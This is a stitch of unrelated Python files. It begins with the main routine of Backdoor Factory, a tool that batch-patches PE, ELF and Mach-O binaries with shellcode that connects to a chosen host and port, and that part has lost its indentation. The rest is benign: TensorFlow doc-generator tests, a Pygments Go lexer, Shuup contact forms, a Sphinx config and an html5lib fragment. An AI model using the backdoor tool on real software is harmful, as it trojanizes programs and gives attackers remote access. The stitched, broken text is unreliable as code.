parser.add_option("-F", "--fat_priority", dest="FAT_PRIORITY", default="x64", action="store",
help="For MACH-O format. If fat file, focus on which arch to patch. Default "
"is x64. To force x86 use -F x86, to force both archs use -F ALL."
)
parser.add_option("-B", "--beacon", dest="BEACON", default=15, action="store", type="int",
help="For payloads that have the ability to beacon out, set the time in secs"
)
parser.add_option("-m", "--patch-method", dest="PATCH_METHOD", default="manual", action="store",
type="string", help="Patching methods for PE files, 'manual' and 'automatic'")
# Parse immediately; `options` drives everything below.
(options, args) = parser.parse_args()
# Identify the binary format of FILE by its magic bytes: returns 'PE',
# 'ELF', 'MACHO', or None for anything unsupported.
def basicDiscovery(FILE):
# Mach-O magics: 64-bit LE, fat/universal, and 32-bit LE headers
macho_supported = ['\xcf\xfa\xed\xfe', '\xca\xfe\xba\xbe',
'\xce\xfa\xed\xfe',
]
testBinary = open(FILE, 'rb')
header = testBinary.read(4)
testBinary.close()
if 'MZ' in header:
return 'PE'
elif 'ELF' in header:
return 'ELF'
elif header in macho_supported:
return "MACHO"
else:
# NOTE(review): this bare string is a no-op expression — it was almost
# certainly meant to be printed before returning None.
'Only support ELF, PE, and MACH-O file formats'
return None
# --- Banner ---------------------------------------------------------------
if options.NO_BANNER is False:
print choice(menu)
print author
print version
time.sleep(1)
else:
print "\t Backdoor Factory"
print author
print version
# --- Directory mode: support-check then batch-backdoor a whole tree ------
if options.DIR:
for root, subFolders, files in os.walk(options.DIR):
for _file in files:
options.FILE = os.path.join(root, _file)
if os.path.isdir(options.FILE) is True:
print "Directory found, continuing"
continue
# NOTE(review): `is "PE"` etc. compare identity, not equality;
# this relies on CPython small-string interning — `== "PE"`
# would be the safe form (repeated throughout below).
is_supported = basicDiscovery(options.FILE)
if is_supported is "PE":
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.CHECK_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD
)
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE
)
elif is_supported is "MACHO":
supported_file = machobin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY,
options.BEACON
)
if options.SUPPORT_CHECK is True:
if os.path.isfile(options.FILE):
is_supported = False
print "file", options.FILE
try:
is_supported = supported_file.support_check()
except Exception, e:
is_supported = False
print 'Exception:', str(e), '%s' % options.FILE
if is_supported is False or is_supported is None:
print "%s is not supported." % options.FILE
#continue
else:
print "%s is supported." % options.FILE
# if supported_file.flItms['runas_admin'] is True:
# print "%s must be run as admin." % options.FILE
print "*" * 50
if options.SUPPORT_CHECK is True:
sys.exit()
# Interactive confirmation before touching anything in the directory.
print ("You are going to backdoor the following "
"items in the %s directory:"
% options.DIR)
dirlisting = os.listdir(options.DIR)
for item in dirlisting:
print " {0}".format(item)
answer = raw_input("Do you want to continue? (yes/no) ")
if 'yes' in answer.lower():
for item in dirlisting:
#print item
print "*" * 50
# NOTE(review): `options.File` (capital F typo) does not update
# options.FILE — the isdir check and patching below operate on
# the file left over from the support-check walk above.
options.File = options.DIR + '/' + item
if os.path.isdir(options.FILE) is True:
print "Directory found, continuing"
continue
print ("backdooring file %s" % item)
result = None
is_supported = basicDiscovery(options.FILE)
try:
if is_supported is "PE":
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.CHECK_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD
)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_pe()
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE
)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_elf()
elif is_supported is "MACHO":
supported_file = machobin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY,
options.BEACON
)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_macho()
if result is None:
print 'Not Supported. Continuing'
continue
else:
print ("[*] File {0} is in backdoored "
"directory".format(supported_file.FILE))
except Exception as e:
print "DIR ERROR", str(e)
else:
print("Goodbye")
sys.exit()
# --- Injector mode (PE only) ---------------------------------------------
if options.INJECTOR is True:
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.CHECK_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD
)
supported_file.injector()
sys.exit()
# --- Single-file mode -----------------------------------------------------
if not options.FILE:
parser.print_help()
sys.exit()
#OUTPUT = output_options(options.FILE, options.OUTPUT)
is_supported = basicDiscovery(options.FILE)
if is_supported is "PE":
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.CHECK_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD
)
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE
)
elif is_supported is "MACHO":
supported_file = machobin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY,
options.BEACON
)
else:
print "Not supported."
sys.exit()
result = supported_file.run_this()
if result is True and options.SUPPORT_CHECK is False:
print "File {0} is in the 'backdoored' directory".format(os.path.basename(supported_file.OUTPUT))
#END BDF MAIN
# Script entry point: run the Backdoor Factory main routine when executed
# directly (no-op when imported as a module).
if __name__ == "__main__":
    bdfMain()
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tools.docs.doc_generator_visitor."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import types
from tensorflow.python.platform import googletest
from tensorflow.tools.docs import doc_generator_visitor
from tensorflow.tools.docs import generate_lib
class NoDunderVisitor(doc_generator_visitor.DocGeneratorVisitor):
  """Visitor that skips private/dunder children, to simplify test fixtures."""

  def __call__(self, parent_name, parent, children):
    """Visit `parent`, forwarding only the children with public names."""
    public_children = []
    for name, obj in children:
      if not name.startswith('_'):
        public_children.append((name, obj))
    super(NoDunderVisitor, self).__call__(parent_name, parent, public_children)
class DocGeneratorVisitorTest(googletest.TestCase):
  """Tests for DocGeneratorVisitor traversal, indexing and duplicate tracking."""

  def test_call_module(self):
    # Visiting a module records its children in `tree` and maps the
    # fully-qualified names of the module and each child in `index`.
    visitor = doc_generator_visitor.DocGeneratorVisitor()
    visitor(
        'doc_generator_visitor', doc_generator_visitor,
        [('DocGeneratorVisitor', doc_generator_visitor.DocGeneratorVisitor)])

    self.assertEqual({'doc_generator_visitor': ['DocGeneratorVisitor']},
                     visitor.tree)
    self.assertEqual({
        'doc_generator_visitor': doc_generator_visitor,
        'doc_generator_visitor.DocGeneratorVisitor':
            doc_generator_visitor.DocGeneratorVisitor,
    }, visitor.index)

  def test_call_class(self):
    # Same bookkeeping as modules, but for a class and one of its members.
    visitor = doc_generator_visitor.DocGeneratorVisitor()
    visitor(
        'DocGeneratorVisitor', doc_generator_visitor.DocGeneratorVisitor,
        [('index', doc_generator_visitor.DocGeneratorVisitor.index)])

    self.assertEqual({'DocGeneratorVisitor': ['index']},
                     visitor.tree)
    self.assertEqual({
        'DocGeneratorVisitor': doc_generator_visitor.DocGeneratorVisitor,
        'DocGeneratorVisitor.index':
            doc_generator_visitor.DocGeneratorVisitor.index
    }, visitor.index)

  def test_call_raises(self):
    # Only modules and classes may be visited as parents; anything else
    # (here: a plain string) is rejected.
    visitor = doc_generator_visitor.DocGeneratorVisitor()
    with self.assertRaises(RuntimeError):
      visitor('non_class_or_module', 'non_class_or_module_object', [])

  def test_duplicates_module_class_depth(self):
    # The same class reachable at different depths: the deeper path wins as
    # the "master" name (see duplicate_of), and nested members follow suit.
    class Parent(object):

      class Nested(object):
        pass

    tf = types.ModuleType('tf')
    tf.Parent = Parent
    tf.submodule = types.ModuleType('submodule')
    tf.submodule.Parent = Parent

    visitor = generate_lib.extract(
        [('tf', tf)],
        private_map={},
        do_not_descend_map={},
        visitor_cls=NoDunderVisitor)

    self.assertEqual({
        'tf.submodule.Parent':
            sorted([
                'tf.Parent',
                'tf.submodule.Parent',
            ]),
        'tf.submodule.Parent.Nested':
            sorted([
                'tf.Parent.Nested',
                'tf.submodule.Parent.Nested',
            ]),
    }, visitor.duplicates)

    self.assertEqual({
        'tf.Parent.Nested': 'tf.submodule.Parent.Nested',
        'tf.Parent': 'tf.submodule.Parent',
    }, visitor.duplicate_of)

    self.assertEqual({
        id(Parent): 'tf.submodule.Parent',
        id(Parent.Nested): 'tf.submodule.Parent.Nested',
        id(tf): 'tf',
        id(tf.submodule): 'tf.submodule',
    }, visitor.reverse_index)

  def test_duplicates_contrib(self):
    # A name under `contrib` loses to the same name elsewhere: the
    # non-contrib path becomes the master name.
    class Parent(object):
      pass

    tf = types.ModuleType('tf')
    tf.contrib = types.ModuleType('contrib')
    tf.submodule = types.ModuleType('submodule')
    tf.contrib.Parent = Parent
    tf.submodule.Parent = Parent

    visitor = generate_lib.extract(
        [('tf', tf)],
        private_map={},
        do_not_descend_map={},
        visitor_cls=NoDunderVisitor)

    self.assertEqual({
        'tf.submodule.Parent':
            sorted(['tf.contrib.Parent', 'tf.submodule.Parent']),
    }, visitor.duplicates)

    self.assertEqual({
        'tf.contrib.Parent': 'tf.submodule.Parent',
    }, visitor.duplicate_of)

    self.assertEqual({
        id(tf): 'tf',
        id(tf.submodule): 'tf.submodule',
        id(Parent): 'tf.submodule.Parent',
        id(tf.contrib): 'tf.contrib',
    }, visitor.reverse_index)

  def test_duplicates_defining_class(self):
    # A member inherited by a subclass is a duplicate; the defining class's
    # path is chosen as the master name.
    class Parent(object):
      obj1 = object()

    class Child(Parent):
      pass

    tf = types.ModuleType('tf')
    tf.Parent = Parent
    tf.Child = Child

    visitor = generate_lib.extract(
        [('tf', tf)],
        private_map={},
        do_not_descend_map={},
        visitor_cls=NoDunderVisitor)

    self.assertEqual({
        'tf.Parent.obj1': sorted([
            'tf.Parent.obj1',
            'tf.Child.obj1',
        ]),
    }, visitor.duplicates)

    self.assertEqual({
        'tf.Child.obj1': 'tf.Parent.obj1',
    }, visitor.duplicate_of)

    self.assertEqual({
        id(tf): 'tf',
        id(Parent): 'tf.Parent',
        id(Child): 'tf.Child',
        id(Parent.obj1): 'tf.Parent.obj1',
    }, visitor.reverse_index)

  def test_duplicates_module_depth(self):
    # When the same object appears at different module depths, the
    # shallower path is preferred as the master name.
    class Parent(object):
      pass

    tf = types.ModuleType('tf')
    tf.submodule = types.ModuleType('submodule')
    tf.submodule.submodule2 = types.ModuleType('submodule2')
    tf.Parent = Parent
    tf.submodule.submodule2.Parent = Parent

    visitor = generate_lib.extract(
        [('tf', tf)],
        private_map={},
        do_not_descend_map={},
        visitor_cls=NoDunderVisitor)

    self.assertEqual({
        'tf.Parent': sorted(['tf.Parent', 'tf.submodule.submodule2.Parent']),
    }, visitor.duplicates)

    self.assertEqual({
        'tf.submodule.submodule2.Parent': 'tf.Parent'
    }, visitor.duplicate_of)

    self.assertEqual({
        id(tf): 'tf',
        id(tf.submodule): 'tf.submodule',
        id(tf.submodule.submodule2): 'tf.submodule.submodule2',
        id(Parent): 'tf.Parent',
    }, visitor.reverse_index)

  def test_duplicates_name(self):
    # Two attributes bound to the same object within one class: the
    # lexicographically earlier name (obj1) becomes the master name.
    class Parent(object):
      obj1 = object()

    Parent.obj2 = Parent.obj1

    tf = types.ModuleType('tf')
    tf.submodule = types.ModuleType('submodule')
    tf.submodule.Parent = Parent

    visitor = generate_lib.extract(
        [('tf', tf)],
        private_map={},
        do_not_descend_map={},
        visitor_cls=NoDunderVisitor)

    self.assertEqual({
        'tf.submodule.Parent.obj1':
            sorted([
                'tf.submodule.Parent.obj1',
                'tf.submodule.Parent.obj2',
            ]),
    }, visitor.duplicates)

    self.assertEqual({
        'tf.submodule.Parent.obj2': 'tf.submodule.Parent.obj1',
    }, visitor.duplicate_of)

    self.assertEqual({
        id(tf): 'tf',
        id(tf.submodule): 'tf.submodule',
        id(Parent): 'tf.submodule.Parent',
        id(Parent.obj1): 'tf.submodule.Parent.obj1',
    }, visitor.reverse_index)
# Test-runner entry point: delegate to TensorFlow's googletest wrapper.
if __name__ == '__main__':
  googletest.main()
# -*- coding: utf-8 -*-
"""
pygments.lexers.go
~~~~~~~~~~~~~~~~~~
Lexers for the Google Go language.
:copyright: Copyright 2006-2015 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, bygroups, words
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation
__all__ = ['GoLexer']
class GoLexer(RegexLexer):
    """
    For `Go <http://golang.org>`_ source.

    .. versionadded:: 1.2
    """
    name = 'Go'
    filenames = ['*.go']
    aliases = ['go']
    mimetypes = ['text/x-gosrc']

    flags = re.MULTILINE | re.UNICODE

    # Single-state lexer: every rule lives in 'root'.  Rule order matters:
    # comments and keywords are matched before numbers/identifiers.
    tokens = {
        'root': [
            (r'\n', Text),
            (r'\s+', Text),
            (r'\\\n', Text),  # line continuations
            (r'//(.*?)\n', Comment.Single),
            (r'/(\\\n)?[*](.|\n)*?[*](\\\n)?/', Comment.Multiline),
            (r'(import|package)\b', Keyword.Namespace),
            (r'(var|func|struct|map|chan|type|interface|const)\b',
             Keyword.Declaration),
            (words((
                'break', 'default', 'select', 'case', 'defer', 'go',
                'else', 'goto', 'switch', 'fallthrough', 'if', 'range',
                'continue', 'for', 'return'), suffix=r'\b'),
             Keyword),
            (r'(true|false|iota|nil)\b', Keyword.Constant),
            # It seems the builtin types aren't actually keywords, but
            # can be used as functions. So we need two declarations.
            (words((
                'uint', 'uint8', 'uint16', 'uint32', 'uint64',
                'int', 'int8', 'int16', 'int32', 'int64',
                'float', 'float32', 'float64',
                'complex64', 'complex128', 'byte', 'rune',
                'string', 'bool', 'error', 'uintptr',
                'print', 'println', 'panic', 'recover', 'close', 'complex',
                'real', 'imag', 'len', 'cap', 'append', 'copy', 'delete',
                'new', 'make'), suffix=r'\b(\()'),
             bygroups(Name.Builtin, Punctuation)),
            (words((
                'uint', 'uint8', 'uint16', 'uint32', 'uint64',
                'int', 'int8', 'int16', 'int32', 'int64',
                'float', 'float32', 'float64',
                'complex64', 'complex128', 'byte', 'rune',
                'string', 'bool', 'error', 'uintptr'), suffix=r'\b'),
             Keyword.Type),
            # imaginary_lit
            (r'\d+i', Number),
            (r'\d+\.\d*([Ee][-+]\d+)?i', Number),
            (r'\.\d+([Ee][-+]\d+)?i', Number),
            (r'\d+[Ee][-+]\d+i', Number),
            # float_lit
            (r'\d+(\.\d+[eE][+\-]?\d+|'
             r'\.\d*|[eE][+\-]?\d+)', Number.Float),
            (r'\.\d+([eE][+\-]?\d+)?', Number.Float),
            # int_lit
            # -- octal_lit
            (r'0[0-7]+', Number.Oct),
            # -- hex_lit
            (r'0[xX][0-9a-fA-F]+', Number.Hex),
            # -- decimal_lit
            (r'(0|[1-9][0-9]*)', Number.Integer),
            # char_lit
            (r"""'(\\['"\\abfnrtv]|\\x[0-9a-fA-F]{2}|\\[0-7]{1,3}"""
             r"""|\\u[0-9a-fA-F]{4}|\\U[0-9a-fA-F]{8}|[^\\])'""",
             String.Char),
            # StringLiteral
            # -- raw_string_lit
            (r'`[^`]*`', String),
            # -- interpreted_string_lit
            (r'"(\\\\|\\"|[^"])*"', String),
            # Tokens
            (r'(<<=|>>=|<<|>>|<=|>=|&\^=|&\^|\+=|-=|\*=|/=|%=|&=|\|=|&&|\|\|'
             r'|<-|\+\+|--|==|!=|:=|\.\.\.|[+\-*/%&])', Operator),
            (r'[|^<>=!()\[\]{}.,;:]', Punctuation),
            # identifier
            (r'[^\W\d]\w*', Name.Other),
        ]
    }
# -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2017, Shoop Commerce Ltd. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from django import forms
from django.contrib.auth import get_user_model
from django.utils.translation import ugettext_lazy as _
from shuup.admin.form_part import FormPart, TemplatedFormDef
from shuup.admin.modules.contacts.forms import (
CompanyContactBaseForm, PersonContactBaseForm
)
from shuup.core.models import PersonContact
from shuup.utils.excs import Problem
from shuup.utils.form_group import FormDef
from shuup.utils.importing import cached_load
class CompanyContactBaseFormPart(FormPart):
    priority = -1000

    def get_form_defs(self):
        """Yield the templated form definition for the company's base data."""
        existing_instance = self.object if self.object.pk else None
        yield TemplatedFormDef(
            "base",
            CompanyContactBaseForm,
            template_name="shuup/admin/contacts/_edit_base_form.jinja",
            required=True,
            kwargs={"instance": existing_instance}
        )

    def form_valid(self, form):
        """Save the base form and adopt the saved contact as our object."""
        saved_contact = form["base"].save()
        # Identity may have changed (not the original object we put in)
        self.object = saved_contact
        return self.object
class PersonContactBaseFormPart(FormPart):
    priority = -1000

    def get_user(self):
        """Resolve the user the new contact should be bound to, if any.

        Reads ``user_id`` from the request's query string.

        :return: The matching user, or None when no binding was requested.
        :raise Problem: If that user already has a `PersonContact`
                        (a user may have at most one contact).
        """
        bind_user_id = self.request.GET.get("user_id")
        if not bind_user_id:
            return None
        bind_user = get_user_model().objects.get(pk=bind_user_id)
        if PersonContact.objects.filter(user=bind_user).exists():
            # Bug fix: `ugettext_lazy` only accepts the message string; the
            # original passed `bind_user` as a kwarg to `_()`, which raises
            # TypeError. Interpolate with `%` after translation instead.
            raise Problem(
                _("User %(bind_user)s already has a contact") % {"bind_user": bind_user}
            )
        return bind_user

    def get_form_defs(self):
        """Yield the templated form definition for the person's base data."""
        yield TemplatedFormDef(
            "base",
            PersonContactBaseForm,
            template_name="shuup/admin/contacts/_edit_base_form.jinja",
            required=True,
            kwargs={"instance": self.object if self.object.pk else None, "user": self.get_user()}
        )

    def form_valid(self, form):
        """Save the base form and adopt the saved contact as our object."""
        self.object = form["base"].save()
        return self.object  # Identity may have changed (not the original object we put in)
class ContactAddressesFormPart(FormPart):
    priority = -900

    def get_form_defs(self):
        """Yield the shipping/billing address forms plus a grouping pseudo-form."""
        initial = {}  # TODO: should we do this? model_to_dict(self.object, AddressForm._meta.fields)
        address_form_class = cached_load("SHUUP_ADDRESS_MODEL_FORM")
        address_sources = (
            ("shipping_address", self.object.default_shipping_address),
            ("billing_address", self.object.default_billing_address),
        )
        for form_name, address_instance in address_sources:
            yield FormDef(
                name=form_name, form_class=address_form_class,
                required=False, kwargs={"instance": address_instance, "initial": initial}
            )
        # Using a pseudo formdef to group the two actual formdefs...
        yield TemplatedFormDef(
            name="addresses", form_class=forms.Form,
            required=False, template_name="shuup/admin/contacts/_edit_addresses_form.jinja"
        )

    def form_valid(self, form):
        """Save any changed address forms and attach them to the contact."""
        address_slots = (
            ("default_shipping_address", "shipping_address"),
            ("default_billing_address", "billing_address"),
        )
        for attr_name, form_name in address_slots:
            address_form = form[form_name]
            if address_form.changed_data:
                setattr(self.object, attr_name, address_form.save())
        self.object.save()
# -*- coding: utf-8 -*-
#
# Platypus documentation build configuration file, created by
# sphinx-quickstart on Wed Sep 16 16:15:02 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# Make the package one directory up importable, so autodoc can find it.
sys.path.insert(0, os.path.abspath('..'))

# -- General configuration ------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
# NOTE(review): 'sphinx.ext.pngmath' is deprecated in newer Sphinx in favor
# of 'sphinx.ext.imgmath'; 'numpydoc' is a third-party package that must be
# installed separately — verify against the build environment.
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.doctest',
    'sphinx.ext.todo',
    'sphinx.ext.viewcode',
    'sphinx.ext.pngmath',
    'numpydoc'
]

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'

# The encoding of source files.
#source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'Platypus'
copyright = u'2015, David Hadka'
author = u'David Hadka'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = ''
# The full version, including alpha/beta/rc tags.
# NOTE(review): both version strings are intentionally left empty here.
release = ''

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []

# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []

# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False

# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True

# -- Options for HTML output ----------------------------------------------

# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'

# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []

# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None

# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}

# If false, no module index is generated.
#html_domain_indices = True

# If false, no index is generated.
#html_use_index = True

# If true, the index is split into individual pages for each letter.
#html_split_index = False

# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None

# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
#   'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
#   'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'

# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}

# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'

# Output file base name for HTML help builder.
htmlhelp_basename = 'Platypus_doc'

# -- Options for LaTeX output ---------------------------------------------

latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',

# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',

# Additional stuff for the LaTeX preamble.
#'preamble': '',

# Latex figure (float) alignment
#'figure_align': 'htbp',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
  (master_doc, 'Platypus.tex', u'Platypus Documentation',
   u'David Hadka', 'manual'),
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False

# If true, show page references after internal links.
#latex_show_pagerefs = False

# If true, show URL addresses after external links.
#latex_show_urls = False

# Documents to append as an appendix to all manuals.
#latex_appendices = []

# If false, no module index is generated.
#latex_domain_indices = True

# -- Options for manual page output ---------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    (master_doc, 'platypus', u'Platypus Documentation',
     [author], 1)
]

# If true, show URL addresses after external links.
#man_show_urls = False

# -- Options for Texinfo output -------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
  (master_doc, 'Platypus', u'Platypus Documentation',
   author, 'Platypus', 'One line description of project.',
   'Miscellaneous'),
]

# Documents to append as an appendix to all manuals.
#texinfo_appendices = []

# If false, no module index is generated.
#texinfo_domain_indices = True

# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'

# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
from html5lib.constants import scopingElements, tableInsertModeElements, namespaces
try:
frozenset
except NameError:
# Import from the sets module for python 2.3
from sets import Set as set
from sets import ImmutableSet as frozenset
# The scope markers are inserted when entering object elements,
# marquees, table cells, and table captions, and are used to prevent formatting
# from "leaking" into tables, object elements, and marquees.
# None serves as the sentinel; ActiveFormattingElements and TreeBuilder
# compare list entries against it to find the most recent marker.
Marker = None
class Node(object):
    """Abstract base class for an item in the tree.

    Attributes:
        name       - the tag name associated with the node
        parent     - the parent of the current node (None for the document node)
        value      - the value of the current node (text nodes and comments)
        attributes - dict holding name/value pairs for the node's attributes
        childNodes - child nodes; must include all elements but not
                     necessarily other node types
        _flags     - miscellaneous flags that can be set on the node
    """

    def __init__(self, name):
        """Create a detached node with the given tag name."""
        self.name = name
        self.parent = None
        self.value = None
        self.attributes = {}
        self.childNodes = []
        self._flags = []

    def __unicode__(self):
        # Render as a start-tag-like string, including attributes if any.
        rendered_attrs = " ".join(["%s=\"%s\"" % (attr_name, attr_value)
                                   for attr_name, attr_value in
                                   self.attributes.iteritems()])
        if not rendered_attrs:
            return "<%s>" % (self.name)
        return "<%s %s>" % (self.name, rendered_attrs)

